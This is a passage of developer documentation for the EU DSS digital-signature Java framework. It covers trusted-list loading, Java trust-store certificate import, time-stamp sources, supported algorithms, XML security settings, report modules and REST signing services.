The job uses three different caches (download, parsing and validation) and a state-machine to be efficient. \n\nTrusted lists are stored on the file system. This offers the possibility to run in offline mode with the stored trusted lists. Trusted Lists can be loaded from the file system and\/or from the Internet.\n \nIn the next sections the different configurations will be covered.\n\n=== TLSource and LOTLSource\n\nSeveral TLSources and several LOTLSources can be injected into a TLValidationJob. The only constraint is the uniqueness of the Trusted List URLs.\n\n[source,java,indent=0]\n.Multiple TLSources and multiple LOTLSources configuration\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=job-config-sources]\n----\n\n==== Trusted List Source (TLSource)\n\nA TLSource allows quickly setting up a trusted list configuration. The URL and the signing certificates for this TL are mandatory. Optionally, predicates \/ filters can be configured to retrieve only a part of the trust service providers or trust services.\n\n[source,java,indent=0]\n.TLSource configuration\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=french-tl-source]\n----\n\n==== List Of Trusted Lists Source (LOTLSource)\n\nA similar configuration is possible for Lists Of Trusted Lists (LOTL). It requires a URL and the possible LOTL signers. Some other parameters are possible. By default, all listed trusted lists are loaded.\n\n[source,java,indent=0]\n.LOTLSource configuration\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=european-lotl-source]\n----\n\n=== DSSFileLoader\n\nThe FileCacheDataLoader is used to download the trusted list contents to the file system. Two different configurations are needed; both of them share the same folder:\n\n * offline refresh : download from the Internet disabled and unlimited cache expiration \n * online refresh : download from the Internet enabled and limited cache expiration\n \n[source,java,indent=0]\n.Offline and Online refresh configuration\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=job-loaders]\n----\n\n=== The SynchronizationStrategy\n\nThe SynchronizationStrategy defines which trusted lists or lists of trusted lists are to be synchronized. By default, DSS synchronizes all of them: DSS does not reject any expired \/ invalid \/... trusted lists. Their content is trusted and a warning is added in a signature \/ certificate validation.\n\nThe strategy is configurable via the interface SynchronizationStrategy:\n\n[source,java,indent=0]\n.Example of a custom SynchronizationStrategy\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=custom-strategy]\n----\n\nDSS provides two implementations : ExpirationAndSignatureCheckStrategy and AcceptAllStrategy (default).\n\n=== The CacheCleaner\n\nThe CacheCleaner specifies how DSS clears the cache (e.g. in case of an expired URL). Two options are available : memory and file system.\n\n[source,java,indent=0]\n.CacheCleaner Configuration\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=cache-cleaner]\n----\n\n=== Alerting from TL Loading\n\nDSS allows running custom alerts in some situations (e.g. invalid TL signature, LOTL location change,...).
Alerting works with two concepts : detection and alert handling. After the download\/parsing\/validation and before the synchronization, the results are tested to detect events and launch alert(s).\n\n[source,java,indent=0]\n.Examples of Alerting\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=alerting]\n----\n\n=== Executor Service\n\nAn Executor Service parameter allows you to customize the way the program executes on your Java machine, by configuring the number of threads to run, the await time and so on. \n\n[source,java,indent=0]\n.Executor Service\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=executor-service]\n----\n\n=== Complete configuration for the European LOTL\n\nBelow, you can find a complete configuration for the European List Of Trusted Lists. The URLs need to be externalized.\n\n[source,java,indent=0]\n.European LOTL Configuration\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/EuropeanLOTLSnippets.java[tags=complete-european-lotl-config]\n----\n\n=== The TL \/ LOTL refresh\n\nThe TL \/ LOTL loading in DSS works as follows: \n\n * Download \/ parse \/ validate all LOTLSources from the configuration with\/without pivot support (multi-threaded)\n * Analyze introduced changes and expire cache entries (new TL URLs, new signing certificates for a TL,...)\n * Create TLSources from the retrieved LOTLs\n * Combine these TLSources with independent TLSources (from the configuration)\n * Download \/ parse \/ validate all TLs (multi-threaded)\n * If alerts are configured, test if an alert needs to be launched\n * If debug is enabled, print the cache status in the log\n * Synchronize the TrustedListsCertificateSource\n * If the cache cleaner is configured, execute it\n * If debug is enabled, print the cache status in the log\n\nThe refresh can be called with the offline or the online loader and runs exactly the same code.\n\n[source,java,indent=0]\n.How to refresh the Trusted List(s) and Lists of Trusted Lists \n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=refresh]\n----\n\n[[KeyStore]]\n==== Java Keystore Management\n\nGenerally (as in the case of the European LOTL), DSS downloads Trusted Lists over the SSL protocol (for resources served via HTTPS), which requires the certificate of the remote source to be present in the Java trust store. The certificates have their own validity period and can expire. If a certificate has expired, it will be replaced on the server by a new one in order to keep supporting a secure SSL connection. The easiest way to know if your Java trust store is outdated and new certificates need to be added is to check your logs during a TLValidationJob update:\n\n[source]\n--\nERROR 14052 --- [pool-2-thread-30] e.e.e.dss.tsl.runnable.AbstractAnalysis : Unable to process GET call for url [https:\/\/sr.riik.ee\/tsl\/estonian-tsl.xml]. Reason : [PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target]\n--\n\nThe `SunCertPathBuilderException` means that the certificate that established the secure connection is not trusted by your Java Virtual Machine. In order to add the certificate to the trust store, you need to do the following steps (the example is based on Windows OS and the Google Chrome browser):\n\n . Open the failed URL in your browser.
In our case it will be 'https:\/\/sr.riik.ee\/tsl\/estonian-tsl.xml', obtained from the logs.\n . Click on the lock icon next to the URL in the tab you just opened. It will open a window about the current connection status.\n . Click on the 'Certificate' button to open the Certificate window.\n . Go to the 'Details' tab and choose 'Copy to File...'.\n . Go through the 'Certificate Export Wizard', saving the certificate in one of the '.CER' formats. Store the file on your file system. In our example it creates the file 'ee.cer'.\n . Run 'Command Prompt' with administrator permissions (right click -> 'Run As Administrator').\n . Execute the following line (ensure that 'keytool' is installed):\n\n.Certificate import\n[source]\n----\nkeytool -import -alias newCert -file pathToCert\\ee.cer -keystore pathToJavaDirectory\\lib\\security\\cacerts -storepass changeit\n----\n\nThe default password for a Java keystore is \"changeit\". Ensure that you have a default configuration, or use the password you have configured instead.\n\nNOTE: In order to apply the changes, the application using Java must be rebooted.\n\nAfter these steps the `TLValidationJob` will successfully download the target Trusted List (i.e. the Estonian one in our example).\n\nNOTE: The described procedure is not the only available solution; if you have difficulties with it, you can search the Internet for an alternative that works for you.\n\n=== TLValidationJobSummary\n\nThe class TLValidationJobSummary contains all processed data about the download (time, error,...), the parsing (extracted information, parsing error,...) and the signature validation (signing certificate, signing time,...).\n\n[source,java,indent=0]\n.How to retrieve the information about the TLValidationJob process \n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=tl-summary]\n----\n\n== TSP Sources\n\nThe Time Stamp Authority (TSA), by creating time-stamp tokens, provides independent and irrefutable proof of time for business transactions, e-documents and digital signatures. The TSA must comply with the IETF RFC 3161 specifications (cf. <<R08>>). A time-stamp is obtained by sending the digest value of the given data and the digest algorithm to the Time Stamp Authority. The returned time-stamp is signed data that contains the digest value, the identity of the TSA, and the time of stamping. This proves that the given data existed before the time of stamping.\nThe DSS framework provides the TSPSource interface to implement the communication with a TSA. The class OnlineTSPSource is the default implementation, using an HTTP(S) communication layer.\nThe following bit of Java code illustrates how you might use this class:\n\n[source,java,indent=0]\n.OnlineTSPSource usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sources\/OnlineTSPSourceTest.java[tags=demo]\n----\n\n=== Time-stamp policy\n\nA time-stamp policy is a \"named set of rules that indicates the applicability of a time-stamp token to a particular community and\/or class of application with common security requirements\". A TSA may define its own policy which enhances the policy defined in RFC 3628. Such a policy shall incorporate or further constrain the requirements identified in RFC 3628. A time-stamp policy may be defined by the user of time-stamp services.\n\n=== Composite TSP Source\n\nSometimes, timestamping servers may encounter interruptions (restart,...).
To avoid failing signature extension, DSS allows a user to configure several TSP Sources. DSS will try the sources one by one until it gets a usable timestamp token. \n\n[source,java,indent=0]\n.Configuration of a CompositeTSPSource\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sources\/CompositeTSPSourceTest.java[tags=demo]\n----\n\n== Supported algorithms\n\nDSS supports several signature algorithms (combinations of an encryption algorithm and a digest algorithm). Below, you can find the supported combinations. The support of the algorithms depends on the registered OID (ASN1) or URI (XML).\n\nIn the next table, XAdES also applies to ASiC with embedded XAdES signatures, and CAdES also concerns PAdES and ASiC with embedded CAdES signatures. \n\nNOTE: SmartCards\/HSMs don't allow signing with all digest algorithms. Please refer to your SmartCard\/HSM provider.\n\n[cols=\"13*^\"]\n.Supported algorithms\n|===\n| | SHA-1 | SHA-224 | SHA-256 | SHA-384 | SHA-512 | SHA3-224 | SHA3-256 | SHA3-384 | SHA3-512 | MD2 | MD5 | RIPEMD160\n\n13+|*RSA*\n\n| XAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] \n\n| CAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"]\n\n| JAdES | | | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | |\n\n13+|*RSA-PSS*\n\n| XAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | \n\n| CAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | |\n\n| JAdES | | | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | |\n\n13+|*ECDSA*\n\n| XAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | | icon:check-circle[role=\"lime\"]\n\n| CAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | |\n\n| JAdES | | | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | |\n\n13+|*Ed25519*\n\n| XAdES | | | | | | | | | | | | \n\n| CAdES | | | | | icon:check-circle[role=\"lime\"] | | | | 
| | \n\n13+|*DSA*\n\n| XAdES | icon:check-circle[role=\"lime\"] | | icon:check-circle[role=\"lime\"] | | | | | | | | | \n\n| CAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | |\n\n| JAdES | | | | | | | | | | | |\n\n13+|*HMAC*\n\n| XAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | | icon:check-circle[role=\"lime\"] \n\n| CAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | |\n\n| JAdES | | | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | |\n|===\n\n== Implementation management with ServiceLoader\n\nDSS incorporates modules that are loaded at run time, based on the chosen configuration and the input data, via a https:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/ServiceLoader.html[ServiceLoader]. This provides flexibility for an end-user to work only with selected modules and a possibility to extend DSS with custom implementations.\n\nIn order to provide the chosen implementation(s) to the ServiceLoader, a file listing all the desired implementations should be created in the resource directory `META-INF\/services` with a name matching the implemented interface (see the illustrative example below). When merging sources (e.g. creating a Fat JAR module), the files can be lost\/overwritten and should then be configured manually (all the required implementations shall be listed).\n\nNOTE: If a DSS module implementing a required interface is added to your project's dependency list, the implementation will be loaded automatically.\n\nThe following modules are provided with independent implementations:\n\n * <<dssUtils>>;\n * <<dssCrlParser>>;\n * <<dssPades>>.\n \nAdditionally, DSS is able to choose the required implementation for the following interfaces:\n \n * `DocumentValidatorFactory` - checks a provided signed file's format and loads a relevant validator;\n * `SignaturePolicyValidator` - checks a signature policy file and loads a relevant validator to be able to process the detected format.\n\nWARNING: If no appropriate available implementation is found, an exception will be thrown.
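\n\nFor illustration, such a provider-configuration file is a plain-text resource named after the fully qualified interface, listing one implementation per line. The interface name and the implementation class below are hypothetical examples:\n\n[source]\n.Example service declaration file (illustrative)\n----\n# src\/main\/resources\/META-INF\/services\/eu.europa.esig.dss.validation.DocumentValidatorFactory\ncom.example.dss.validation.MyDocumentValidatorFactory\n----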
\n\n=== Document Validation Factory\n\nThis factory is used to create a required instance of a `DocumentValidator` based on the provided file's format (signature or timestamp). An implementation shall perform a file format check and load the related <<signedDocumentValidator>> implementation to be used for the file's validation.\n\nThe following implementations are present in DSS:\n\n * CMSDocumentValidatorFactory : loads CMSDocumentValidator, used for a CAdES validation (delivered in the dss-cades module);\n * XMLDocumentValidatorFactory : loads XMLDocumentValidator, used for a XAdES validation (delivered in the dss-xades module);\n * PDFDocumentValidatorFactory : loads PDFDocumentValidator, used for a PAdES validation (delivered in the dss-pades module);\n * JAdESDocumentValidatorFactory : loads JWSCompactDocumentValidator or JWSSerializationDocumentValidator, depending on the provided JSON signature type (delivered in the dss-jades module);\n * ASiCContainerWithCAdESValidatorFactory : loads ASiCContainerWithCAdESValidator (delivered in the dss-asic-cades module);\n * ASiCContainerWithXAdESValidatorFactory : loads ASiCContainerWithXAdESValidator (delivered in the dss-asic-xades module);\n * DetachedTimestampValidatorFactory : loads DetachedTimestampValidator, for an independent timestamp validation (delivered in the dss-document module).\n\n=== Signature Policy Validator\n\nThis interface is used to validate a signature policy reference extracted from a signature. The following implementations are provided:\n\n * BasicASNSignaturePolicyValidator : validates policy files which are based on ETSI TR 102 272;\n * XMLSignaturePolicyValidator : validates XML signature policies supporting transformations;\n * NonASN1SignaturePolicyValidator : validates a policy by the digest computed on an original file's content;\n * ZeroHashSignaturePolicyValidator : validates a policy if a \"zero hash\" value is defined in a signature (see <<R02>>);\n * EmptySignaturePolicyValidator : is used if a policy file is not found or not accessible.\n\n== Multi-threading\n\nDSS can be used in multi-threaded environments, but some points need to be considered, such as resource sharing and caching. All operations are stateless and this needs to remain so. Some resources can be shared; others are specific to an operation. \n\nFor each provided operation, DSS requires a CertificateVerifier object. This object is responsible for providing certificates and access to external resources (AIA, CRL, OCSP,...). At the beginning of every operation, CertificateSources and RevocationSources are created for each signature \/ timestamp \/ revocation data. The extracted information is combined with the configured sources in the CertificateVerifier. For these reasons, integrators need to be careful about the CertificateVerifier configuration.\n\n=== Resource sharing\n\nThe trusted certificates can be shared between multiple threads because these certificates are static. This means they don't require further analysis: their status won't evolve. For these certificates, DSS doesn't need to collect the issuer certificate and\/or their revocation data. \n\nBy contrast, the adjunct certificates cannot be shared. These certificates concern a specific signature\/validation operation. This parameter is used to provide missing certificate(s). When DSS is unable to build the complete certificate path with the provided certificates (as signature parameters or embedded within a signature), it is possible to inject the missing certificates. These certificates are not necessarily trusted and may require future \"modifications\" like revocation data collection,...
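\n\nAs a minimal sketch of these sharing rules (assuming the plural `setTrustedCertSources` \/ `setAdjunctCertSources` setters of recent DSS versions; `sharedTrustedSource` and `adjunctSourceForThisSignature` are assumed to exist):\n\n[source,java,indent=0]\n.Sharing certificate sources between threads (illustrative sketch)\n----\n\/\/ static trust anchors: safe to share between all threads \/ operations\nCertificateSource trustedSource = sharedTrustedSource;\n\n\/\/ a new verifier per operation: adjunct certificates concern one signature only\nCommonCertificateVerifier certificateVerifier = new CommonCertificateVerifier();\ncertificateVerifier.setTrustedCertSources(trustedSource);\ncertificateVerifier.setAdjunctCertSources(adjunctSourceForThisSignature);\n----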
\n\n=== Caching\n\nIn case of multi-threaded usage, we strongly recommend caching of external resources. All external resources can be cached (AIA, CRL, OCSP) to improve performance and to avoid requesting the same resources too many times. FileCacheDataLoader and JdbcCacheCRLSource can help you with this. \n\n[[xmlSecurities]]\n== XML Securities\n\nSince DSS 5.7, the framework allows custom configuration of XML-related modules for enabling\/disabling of XML securities (e.g. in order to use Xalan or Xerces).\n\nWARNING: We strongly recommend not disabling security features and not using deprecated dependencies. Be aware: the feature is designed only for experienced users, and all changes made in the module are at your own risk.\n\nThe configuration is available for the following classes:\n\n * `javax.xml.parsers.DocumentBuilderFactory` with a `DocumentBuilderFactoryBuilder` - builds a DOM document object from the obtained XML file and creates a new Document;\n * `javax.xml.transform.TransformerFactory` with a `TransformerFactoryBuilder` - loads XML templates and builds DOM objects;\n * `javax.xml.validation.SchemaFactory` with a `SchemaFactoryBuilder` - loads XML Schemas;\n * `javax.xml.validation.Validator` with a `ValidatorConfigurator` - configures a validator to validate an XML document against an XML Schema. \n \nAll the classes can be configured with the following methods (example for `TransformerFactory`):\n\n[source,java,indent=0]\n.XMLSecurities configuration\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/XMLSecuritiesConfigTest.java[tags=demo]\n----\n\nThe `javax.xml.parsers.DocumentBuilderFactory`, which allows parsing XML files and creating DOM `Document` objects, can be configured with the following methods:\n\nNOTE: Since DSS 5.9 the configuration of `javax.xml.parsers.DocumentBuilderFactory` has been moved from `DomUtils` to a new singleton class `DocumentBuilderFactoryBuilder`.\n\n[source,java,indent=0]\n.DocumentBuilderFactory configuration\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/XMLSecuritiesConfigTest.java[tags=dbf]\n----\n\nThe class `XmlDefinerUtils` is a singleton, therefore all changes performed on the instance will have an impact on all calls of the related methods.\n\n== JAXB modules\n\nSince version 5.5, DSS provides the following JAXB modules with a harmonized structure: \n\n * `dss-policy-jaxb` - defines the validation policy JAXB model\n * `dss-diagnostic-jaxb` - defines the Diagnostic Data JAXB model\n * `dss-detailed-report-jaxb` - defines the Detailed Report JAXB model\n * `dss-simple-report-jaxb` - defines the Simple Report JAXB model\n * `dss-simple-certificate-report-jaxb` - defines the Certificate Simple Report JAXB model\n \nAll modules share the same logic and have the following structure (where *** is a model name):\n\n`*_dss-***-jaxb_*`::\n\t`*_src\/main\/java_*`:::\n\t\t`*_eu.europa.esig.dss.***_*`::::\n\t\t\t** `*_***.java_*` - wrapper(s) which ease the JAXB manipulation\n\t\t\t** `*_..._*`\n\t\t\t** `*_***Facade.java_*` - class which allows marshalling\/unmarshalling of jaxb objects, generation of HTML\/PDF content, etc.\n\t\t\t** `*_***XmlDefiner.java_*` - class which contains the model definition (XSD, XSLT references, ObjectFactory)\n\t\t\t** `*_jaxb_*` - generated at compile time\n\t\t\t \t*** `*_Xml***.java_*` - JAXB model\n\t\t\t\t*** `*_..._*`\n\t`*_src\/main\/resources_*`:::\n\t\t`*_xsd_*`::::\n\t\t\t** `*_***.xsd_*` - XML Schema (XSD) for the module's model
\n\t\t\t** `*_binding.xml_*` - XJC instructions to generate the JAXB model from the XSD\n\t\t`*_xslt_*`::::\n\t\t\t** `*_html_*`\n\t\t\t*** \t`*_***.xslt_*` - XML Stylesheet for the HTML generation\n\t\t\t** `*_pdf_*`\n\t\t\t***\t`*_***.xslt_*` - XML Stylesheet for the PDF generation\n\nIn the main classes, a `Facade` is present to quickly operate with the JAXB objects (e.g. marshall, unmarshall, generate the HTML\/PDF, validate the XML structure,...).\n\n[source,java,indent=0]\n.DetailedReportFacade usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/SignedDocumentValidatorTest.java[tags=demo-facade]\n----\n\nAn `XmlDefiner` is also available, with access to the embedded XML Schemas (XSD), the XML Stylesheets (XSLT) to be able to generate the HTML or the PDF content (for DSS-specific JAXB), and the JAXB Object Factory.\n\n[source,java,indent=0]\n.DetailedReportXmlDefiner usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/SignedDocumentValidatorTest.java[tags=demo-xml-definer]\n----\n\n=== Report stylesheets\n\nThe report modules (namely: `dss-simple-report-jaxb`, `dss-simple-certificate-report-jaxb` and `dss-detailed-report-jaxb`) each contain two XSLT style sheets for final report generation:\n\n * Bootstrap 4 XSLT for the HTML report;\n * PDF XSLT for the PDF report.\n\nNOTE: Since DSS 5.9 only the Bootstrap 4 XSLT is provided within the framework for HTML report generation.\n \nIn order to generate a report with a selected style sheet you need to call a relevant method in a Facade class (see the class definitions above):\n\n[source,java,indent=0]\n.HTML report generation\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/StylesheetSnippet.java[tags=demo]\n----\n\nOtherwise, if you need to customize the transformer, you can create a report by using an XmlDefiner:\n\n[source,java,indent=0]\n.Custom report generation\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/StylesheetSnippet.java[tags=custom]\n----\n\n== Alerts\n\nSince DSS 5.7 the framework includes an extended possibility to execute custom processes upon arbitrarily defined events.\n\nThe `Alert` is a basic interface used to trigger a process on a passed object.\nDSS provides an `AbstractAlert` implementation of the interface with a clearly defined structure. The class must be instantiated with two attributes:\n\n * `AlertDetector` - used to detect an event\/state of the object and trigger a process;\n * `AlertHandler` - defines a process to be executed on an object.
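\n\nAs an illustration, a custom alert can be assembled from these two building blocks. The sketch below assumes the functional-style `AlertDetector` \/ `AlertHandler` interfaces of the `dss-alerts` module and an existing SLF4J `LOG` instance:\n\n[source,java,indent=0]\n.Custom alert sketch (illustrative)\n----\n\/\/ detect the event\/state to react on\nAlertDetector<String> detector = status -> status.contains(\"ERROR\");\n\n\/\/ define the process to execute when the event is detected\nAlertHandler<String> handler = status -> LOG.warn(\"Problem detected : {}\", status);\n\n\/\/ AbstractAlert glues detection and handling together\nAlert<String> alert = new AbstractAlert<String>(detector, handler) {};\nalert.alert(\"ERROR during TL loading\");\n----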
\n\nIn its basic module, the framework provides a few alerts based on a `Status`:\n\n * `ExceptionOnStatusAlert` - throws an `AlertException` (RuntimeException) when the status reports an issue;\n * `LogOnStatusAlert` - logs a message with the defined log level;\n * `SilentOnStatusAlert` - ignores the reported issue and does nothing.\n\nThe usage of alerts is available in the following classes:\n\n * <<xmlSecurities>> configurators from the `dss-jaxb-parsers` module : `TransformerFactoryBuilder`, `SchemaFactoryBuilder`, `ValidatorConfigurator`;\n * <<certificateVerifier>> - to handle the unexpected situation(s) in a custom way (`AlertException` was introduced to re-throw exceptions);\n * <<tlValidationJob>> - to process custom actions on a change\/state occurring on the load of LOTL\/TLs (see `LOTLAlert` and `TLAlert`).\n\n== I18N (Internationalization)\n\nSince DSS 5.6 a new module has been introduced allowing changing the language of reports generated by DSS. The current version of the framework allows customization of text values only for a `DetailedReport`.\n\nA target language of the report can be set with the following code:\n\n[source,java,indent=0]\n.Language customization\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=i18n]\n----\n\nIf no language is specified, the framework will use the default Locale obtained from the OS of the running machine. If a requested language is not found, the default translation will be used.\n\nAs a default configuration, DSS provides an English translation.\n\nIn order to provide a custom translation, a new file must be created inside the `src\\main\\resources` directory of your project, with a name following one of the patterns: \n\n`dss-messages_XX.properties` or \n`dss-messages_XX_YY.properties`, where:\n\n * XX - an abbreviation of a target language;\n * YY - a country code.\n\nFor example, for the French language a file with the name `dss-messages_fr.properties` needs to be created, or `dss-messages_fr_FR.properties` to use it only for the France locale.\n\n== Additional features\n\n=== Certificate validation\n\nDSS offers the possibility to validate a certificate. For a given certificate, the framework builds a certificate path up to a known trust anchor (trusted list, keystore,...), validates each found certificate (OCSP \/ CRL) and determines its European \"qualification\". \n\nTo determine the certificate qualification, DSS follows the draft standard ETSI TS 119 172-4 (<<R10>>). It analyses the certificate properties (QCStatements, Certificate Policies,...) and applies possible overrules from the related trusted list (\"caught\" qualifiers from a trust service). More information about qualifiers can be found in the standard ETSI TS 119 612 (<<R11>>).\n\nDSS always computes the status at two different times : certificate issuance and signing\/validation time. The certificate qualification can evolve over time; its status is not immutable (e.g. a trust service provider can lose its granted status). The eIDAS regulation (<<R12>>) clearly defines these different times in Article 32 and the related Annex I.
\n\n[source,java,indent=0]\n.Validate a certificate and retrieve its qualification level\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/validate\/CertificateValidationTest.java[tags=demo]\n----\n\n=== SSL Certificate validation (QWAC)\n\nWith DSS, it is also possible to validate an SSL certificate against the EUMS TL and the ETSI TS 119 615 procedures to determine if it is a Qualified certificate for WebSite Authentication (QWAC).\n\n[source,java,indent=0]\n.Validate an SSL certificate and retrieve its qualification level\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/validate\/QWACValidationTest.java[tags=demo]\n----\n\n=== Extract the signed data from a signature\n\nDSS is able to retrieve the original data from a valid signature. \n\n[source,java,indent=0]\n.Retrieve original data from a signed document\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/validate\/RetrieveOriginalDocumentTest.java[tags=demo]\n----\n\n== REST and SOAP Services\n\nDSS offers REST and SOAP web services. Additionally, we also provide a SOAP-UI project and Postman samples in the `dss-cookbook` module.\n\nThe different webservices are: \n\n * Signature webservices (`dss-signature-soap` \/ `dss-signature-rest`) and their clients : they expose methods to allow signing and extending or counter-signing a signature from a client.\n * Server-signing webservice (`dss-server-signing-soap` \/ `dss-server-signing-rest`) and their clients : they expose methods to retrieve keys from a server (PKCS#11, PKCS#12, HSM,...) and to sign the digest on the server side.\n * Signature validation webservices (`dss-validation-soap` \/ `dss-validation-rest`) and their clients : they expose methods to allow signature validation, with an optional detached file and an optional validation policy.\n * Certificate validation webservices (`dss-certificate-validation-soap` \/ `dss-certificate-validation-rest`) and their clients : they expose methods to allow certificate validation, with an optional provided certificate chain and a custom validation time.\n * Timestamp webservices (`dss-timestamp-remote-soap` \/ `dss-timestamp-remote-rest`) and their clients : they expose methods to allow remote timestamp creation, by providing the digest value to be timestamped and the digest algorithm used for the digest calculation.\n \nThe data structure in the webservices is similar in both REST and SOAP modules.\n\nThis documentation covers the REST calls. All the REST services present in DSS are compliant with the https:\/\/www.openapis.org\/[OpenAPI Specification].\n\n=== REST signature service\n\nThis service exposes four methods for one or more document(s): \n\n[source,java,indent=0]\n.Rest signature service\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/RestSignatureServiceSnippet.java[tags=demo]\n----\n \n==== Get data to sign\n\nThe method allows retrieving the data to be signed. The user sends the document to be signed, the parameters (signature level,...) and the certificate chain.\n\nWARNING: The parameters in getDataToSign and signDocument MUST be the same (especially the signing date).
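\n\nAs an illustration, the expected two-step flow with the REST client could look as follows. This sketch assumes the `RestDocumentSignatureService` client and the DTOs of the `dss-signature-rest` module; the `sign(...)` call stands for your own external signing step:\n\n[source,java,indent=0]\n.Two-step signing flow (illustrative sketch)\n----\n\/\/ step 1 : retrieve the data to be signed\nToBeSignedDTO dataToSign = restClient.getDataToSign(new DataToSignOneDocumentDTO(toSignDocument, parameters));\n\n\/\/ sign the data externally (SmartCard, HSM,...)\nSignatureValueDTO signatureValue = sign(dataToSign);\n\n\/\/ step 2 : create the signed document with the SAME parameters (especially the signing date)\nRemoteDocument signedDocument = restClient.signDocument(new SignOneDocumentDTO(toSignDocument, parameters, signatureValue));\n----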
